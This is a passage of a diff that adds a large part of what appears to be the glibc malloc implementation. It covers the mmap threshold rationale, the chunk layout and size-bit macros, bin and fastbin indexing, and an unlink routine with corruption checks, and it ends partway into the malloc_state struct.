+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Same, except also perform an argument and result check.  First, we check
+   that the padding done by request2size didn't result in an integer
+   overflow.  Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
+   size isn't so large that a later alignment would lead to another integer
+   overflow.  */
+#define checked_request2size(req, sz) \
+({				    \
+  (sz) = request2size (req);	    \
+  if (((sz) < (req))		    \
+      || REQUEST_OUT_OF_RANGE (sz)) \
+    {				    \
+      __set_errno (ENOMEM);	    \
+      return 0;			    \
+    }				    \
+})
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+/* Take a chunk off a bin list.  */
+static void
+unlink_chunk (mstate av, mchunkptr p)
+{
+  if (chunksize (p) != prev_size (next_chunk (p)))
+    malloc_printerr ("corrupted size vs. prev_size");
+
+  mchunkptr fd = p->fd;
+  mchunkptr bk = p->bk;
+
+  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
+    malloc_printerr ("corrupted double-linked list");
+
+  fd->bk = bk;
+  bk->fd = fd;
+  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
+    {
+      if (p->fd_nextsize->bk_nextsize != p
+	  || p->bk_nextsize->fd_nextsize != p)
+	malloc_printerr ("corrupted double-linked list (not small)");
+
+      if (fd->fd_nextsize == NULL)
+	{
+	  if (p->fd_nextsize == p)
+	    fd->fd_nextsize = fd->bk_nextsize = fd;
+	  else
+	    {
+	      fd->fd_nextsize = p->fd_nextsize;
+	      fd->bk_nextsize = p->bk_nextsize;
+	      p->fd_nextsize->bk_nextsize = fd;
+	      p->bk_nextsize->fd_nextsize = fd;
+	    }
+	}
+      else
+	{
+	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
+	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
+	}
+    }
+}
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given it's sole purpose is to reduce number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
